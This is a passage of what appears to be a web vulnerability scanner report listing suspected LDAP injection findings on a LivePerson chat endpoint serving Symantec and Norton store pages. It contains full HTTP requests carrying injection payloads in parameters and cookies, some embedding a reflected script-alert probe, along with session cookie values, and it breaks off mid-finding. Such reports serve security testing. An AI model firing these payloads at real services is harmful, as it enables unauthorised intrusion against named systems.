HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:37:50 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:37:50 GMT Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064 Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 427 lpConnLib.Process({"ResultSet": {"lpCallId":"243824564852-218836609740","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SET-REJECT", "js_code": "lpMTag.lpVisitorStatus = 'REJECT_STATUS';"},{"code_id": "INVITE-TIMEOUT", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});
1.6. http://sales.liveperson.net/hc/2735064/ [lpCallId parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://sales.liveperson.net
Path: /hc/2735064/
Issue detail
The lpCallId parameter appears to be vulnerable to LDAP injection attacks. The payloads 93a3bb2cb00a26ff)(sn=* and 93a3bb2cb00a26ff)!(sn=* were each submitted in the lpCallId parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=93a3bb2cb00a26ff)(sn=* &protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508&id=2707016684&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Ahomepage%3Ahomepage&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=1%20sec&PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=en&SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=359A5BC1-187B-E37B-9025-A486DEF7EF50&SV%21partner=store%3Asymantec&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=8455684308930202655; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603881647
Response 1
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:33:31 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:33:31 GMT Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064 Set-Cookie: LivePersonID=-5110247826455-1315603892:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:33:31 GMT; path=/hc/2735064; domain=.liveperson.net Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 84 lpConnLib.Process({"ResultSet": {"lpCallId":"","lpCallError":"REQUEST_NOT_VALID"}});
Request 2
GET /hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=93a3bb2cb00a26ff)!(sn=* &protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508&id=2707016684&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Ahomepage%3Ahomepage&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=1%20sec&PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=en&SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=359A5BC1-187B-E37B-9025-A486DEF7EF50&SV%21partner=store%3Asymantec&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=8455684308930202655; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603881647
Response 2
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:33:32 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:33:32 GMT Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064 Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 84 lpConnLib.Process({"ResultSet": {"lpCallId":"","lpCallError":"REQUEST_NOT_VALID"}});
1.7. http://sales.liveperson.net/hc/71097838/ [HumanClickACTIVE cookie]
Summary
Severity: High
Confidence: Tentative
Host: http://sales.liveperson.net
Path: /hc/71097838/
Issue detail
The HumanClickACTIVE cookie appears to be vulnerable to LDAP injection attacks. The payloads *)(sn=* and *)!(sn=* were each submitted in the HumanClickACTIVE cookie. The two requests resulted in different responses, indicating that the input may be incorporated into a conjunctive LDAP query in an unsafe manner.
Request 1
GET /hc/71097838/?&site=71097838&cmd=mTagInviteShown&lpCallId=466950613539-178177123656&protV=20&lpjson=1&page=http%3A//www.symantec.com/store/products/index.jsp%3Finid%3Dus_pagenotfound_smb_store&id=9383966153&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true&title=Store%20Shop%20Products%20-%20Symantec%20Corp.&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&channel=web&t=1 HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://www.symantec.com/store/products/index.jsp?inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=*)(sn=*
Response 1
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:34:47 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:34:47 GMT Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838 Set-Cookie: LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; expires=Sat, 08-Sep-2012 21:34:47 GMT; path=/hc/71097838; domain=.liveperson.net Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 343 lpConnLib.Process({"ResultSet": {"lpCallId":"466950613539-178177123656","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INVITE-SHOWN", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});
Request 2
GET /hc/71097838/?&site=71097838&cmd=mTagInviteShown&lpCallId=466950613539-178177123656&protV=20&lpjson=1&page=http%3A//www.symantec.com/store/products/index.jsp%3Finid%3Dus_pagenotfound_smb_store&id=9383966153&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true&title=Store%20Shop%20Products%20-%20Symantec%20Corp.&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&channel=web&t=1 HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://www.symantec.com/store/products/index.jsp?inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=*)!(sn=*
Response 2
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:34:49 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:34:49 GMT Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838 Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 343 lpConnLib.Process({"ResultSet": {"lpCallId":"466950613539-178177123656","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INVITE-SHOWN", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});
1.8. http://sales.liveperson.net/hc/71097838/ [HumanClickSiteContainerID_71097838 cookie]
Summary
Severity: High
Confidence: Tentative
Host: http://sales.liveperson.net
Path: /hc/71097838/
Issue detail
The HumanClickSiteContainerID_71097838 cookie appears to be vulnerable to LDAP injection attacks. The payloads *)(sn=* and *)!(sn=* were each submitted in the HumanClickSiteContainerID_71097838 cookie. The two requests resulted in different responses, indicating that the input may be incorporated into a conjunctive LDAP query in an unsafe manner.
Request 1
GET /hc/71097838/?&site=71097838&cmd=mTagInPage&lpCallId=465838986914-760230379877&protV=20&lpjson=1&page=http%3A//store.symantec.com/%3Finid%3Dus_pagenotfound_smb_store&id=4734450057&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://store.symantec.com/?inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:-1:-1:-1; HumanClickSiteContainerID_71097838=*)(sn=* ; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603879317
Response 1
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:33:40 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838 Set-Cookie: LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; expires=Sat, 08-Sep-2012 21:33:40 GMT; path=/hc/71097838; domain=.liveperson.net Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:33:40 GMT Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 188 lpConnLib.Process({"ResultSet": {"lpCallId":"465838986914-760230379877","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});
Request 2
GET /hc/71097838/?&site=71097838&cmd=mTagInPage&lpCallId=465838986914-760230379877&protV=20&lpjson=1&page=http%3A//store.symantec.com/%3Finid%3Dus_pagenotfound_smb_store&id=4734450057&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://store.symantec.com/?inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:-1:-1:-1; HumanClickSiteContainerID_71097838=*)!(sn=* ; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603879317
Response 2
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:33:41 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838 Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:33:41 GMT Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 188 lpConnLib.Process({"ResultSet": {"lpCallId":"465838986914-760230379877","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});
1.9. http://sales.liveperson.net/hc/71097838/ [lpCallId parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://sales.liveperson.net
Path: /hc/71097838/
Issue detail
The lpCallId parameter appears to be vulnerable to LDAP injection attacks. The payloads 92b3a3f88ff05d96)(sn=* and 92b3a3f88ff05d96)!(sn=* were each submitted in the lpCallId parameter. The two requests resulted in different responses, indicating that the input may be incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /hc/71097838/?&site=71097838&cmd=mTagStartPage&lpCallId=92b3a3f88ff05d96)(sn=* &protV=20&lpjson=1&page=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps6ed59%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E0e8182bf4be&id=9609075416&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-sales-business-english&activePlugin=none&cobrowse=true&PV%21unit=sales-business&PV%21Section=Products&PV%21BusinessPageCategory=Overview&PV%21ProductFamily=Information%20Risk%20%26%20Compliance&PV%21ProductName=VeriSign%20Identity%20Protection%20Fraud%20Detection%20Service&PV%21ProductId=fds&PV%21pageLoadTime=2%20sec&PV%21visitorActive=1&SV%21language=english&SV%21MarketTier=&title=Risk-Based%20Authentication%2C%20Fraud%20Detection%2C%20Identity%20Theft%20Protection%20-%20VeriSign%20Identity%20Protection%20Fraud%20Detection%20Service&referrer=http%3A//burp/show/2&cookie=s_vi%3D%5BCS%5Dv1%7C2735422985161DC5-600001A3801B01DD%5BCE%5D%3B%20IS3_History%3D0-0-0____%3B%20IS3_GSV%3DDPL-0_TES-1315621927_PCT-1315621927_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-%3B%20s_sq%3D%255B%255BB%255D%255D%3B%20s_pers%3D%2520s_nr%253D1315621972496-New%257C1336357972496%253B%2520event69%253Devent69%257C1336357972499%253B%3B%20s_sess%3D%2520s_sv_sid%253D806960442771%253B%2520s_cc%253Dtrue%253B%2520s_sq%253D%253B%3B%20s_sv_112_s1%3D1@16@a//1315621570007%3B%20s_sv_112_p1%3D1@25@s/6036/5742/5736/5417%26e/9 HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps6ed59%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0e8182bf4be User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=1932846460867730791; 
LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147
Response 1
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:34:23 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:34:23 GMT Set-Cookie: HumanClickSiteContainerID_71097838=Secondary1; path=/hc/71097838 Set-Cookie: LivePersonID=-5110247826455-1315604062:-1:1315604022:-1:-1; expires=Sat, 08-Sep-2012 21:34:23 GMT; path=/hc/71097838; domain=.liveperson.net Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 84 lpConnLib.Process({"ResultSet": {"lpCallId":"","lpCallError":"REQUEST_NOT_VALID"}});
Request 2
GET /hc/71097838/?&site=71097838&cmd=mTagStartPage&lpCallId=92b3a3f88ff05d96)!(sn=* &protV=20&lpjson=1&page=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps6ed59%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E0e8182bf4be&id=9609075416&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-sales-business-english&activePlugin=none&cobrowse=true&PV%21unit=sales-business&PV%21Section=Products&PV%21BusinessPageCategory=Overview&PV%21ProductFamily=Information%20Risk%20%26%20Compliance&PV%21ProductName=VeriSign%20Identity%20Protection%20Fraud%20Detection%20Service&PV%21ProductId=fds&PV%21pageLoadTime=2%20sec&PV%21visitorActive=1&SV%21language=english&SV%21MarketTier=&title=Risk-Based%20Authentication%2C%20Fraud%20Detection%2C%20Identity%20Theft%20Protection%20-%20VeriSign%20Identity%20Protection%20Fraud%20Detection%20Service&referrer=http%3A//burp/show/2&cookie=s_vi%3D%5BCS%5Dv1%7C2735422985161DC5-600001A3801B01DD%5BCE%5D%3B%20IS3_History%3D0-0-0____%3B%20IS3_GSV%3DDPL-0_TES-1315621927_PCT-1315621927_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-%3B%20s_sq%3D%255B%255BB%255D%255D%3B%20s_pers%3D%2520s_nr%253D1315621972496-New%257C1336357972496%253B%2520event69%253Devent69%257C1336357972499%253B%3B%20s_sess%3D%2520s_sv_sid%253D806960442771%253B%2520s_cc%253Dtrue%253B%2520s_sq%253D%253B%3B%20s_sv_112_s1%3D1@16@a//1315621570007%3B%20s_sv_112_p1%3D1@25@s/6036/5742/5736/5417%26e/9 HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps6ed59%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0e8182bf4be User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=1932846460867730791; 
LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147
Response 2
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:34:24 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:34:24 GMT Set-Cookie: HumanClickSiteContainerID_71097838=Secondary1; path=/hc/71097838 Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 84 lpConnLib.Process({"ResultSet": {"lpCallId":"","lpCallError":"REQUEST_NOT_VALID"}});
1.10. http://sales.liveperson.net/hc/71097838/ [protV parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://sales.liveperson.net
Path: /hc/71097838/
Issue detail
The protV parameter appears to be vulnerable to LDAP injection attacks. The payloads *)(sn=* and *)!(sn=* were each submitted in the protV parameter. The two requests resulted in different responses, indicating that the input may be incorporated into a conjunctive LDAP query in an unsafe manner.
Request 1
GET /hc/71097838/?&site=71097838&cmd=mTagInviteTimeout&lpCallId=466464716009-798532190732&protV=*)(sn=* &lpjson=1&page=http%3A//store.symantec.com/%3Finid%3Dus_pagenotfound_smb_store&id=4734450057&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true&title=Buy%20Symantec%20Business%20Products%20-%20Shop%20Small%20Business%20%7C%20Symantec%20Business%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&timeout=120&channel=web&t=1 HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://store.symantec.com/?inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147
Response 1
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:35:23 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:35:23 GMT Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838 Set-Cookie: LivePersonID=-5110247826455-1315604120:-1:1315604070:-1:-1; expires=Sat, 08-Sep-2012 21:35:23 GMT; path=/hc/71097838; domain=.liveperson.net Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 427 lpConnLib.Process({"ResultSet": {"lpCallId":"466464716009-798532190732","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SET-REJECT", "js_code": "lpMTag.lpVisitorStatus = 'REJECT_STATUS';"},{"code_id": "INVITE-TIMEOUT", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});
Request 2
GET /hc/71097838/?&site=71097838&cmd=mTagInviteTimeout&lpCallId=466464716009-798532190732&protV=*)!(sn=* &lpjson=1&page=http%3A//store.symantec.com/%3Finid%3Dus_pagenotfound_smb_store&id=4734450057&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true&title=Buy%20Symantec%20Business%20Products%20-%20Shop%20Small%20Business%20%7C%20Symantec%20Business%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&timeout=120&channel=web&t=1 HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://store.symantec.com/?inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147
Response 2
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:35:24 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:35:24 GMT Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838 Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 427 lpConnLib.Process({"ResultSet": {"lpCallId":"466464716009-798532190732","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SET-REJECT", "js_code": "lpMTag.lpVisitorStatus = 'REJECT_STATUS';"},{"code_id": "INVITE-TIMEOUT", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});
1.11. http://sales.liveperson.net/hc/71097838/ [t parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://sales.liveperson.net
Path: /hc/71097838/
Issue detail
The t parameter appears to be vulnerable to LDAP injection attacks. The payloads *)(sn=* and *)!(sn=* were each submitted in the t parameter. The two requests resulted in different responses, indicating that the input may be incorporated into a conjunctive LDAP query in an unsafe manner.
Request 1
GET /hc/71097838/?&site=71097838&cmd=mTagInviteTimeout&lpCallId=466464716009-798532190732&protV=20&lpjson=1&page=http%3A//store.symantec.com/%3Finid%3Dus_pagenotfound_smb_store&id=4734450057&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true&title=Buy%20Symantec%20Business%20Products%20-%20Shop%20Small%20Business%20%7C%20Symantec%20Business%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&timeout=120&channel=web&t=*)(sn=* HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://store.symantec.com/?inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147
Response 1
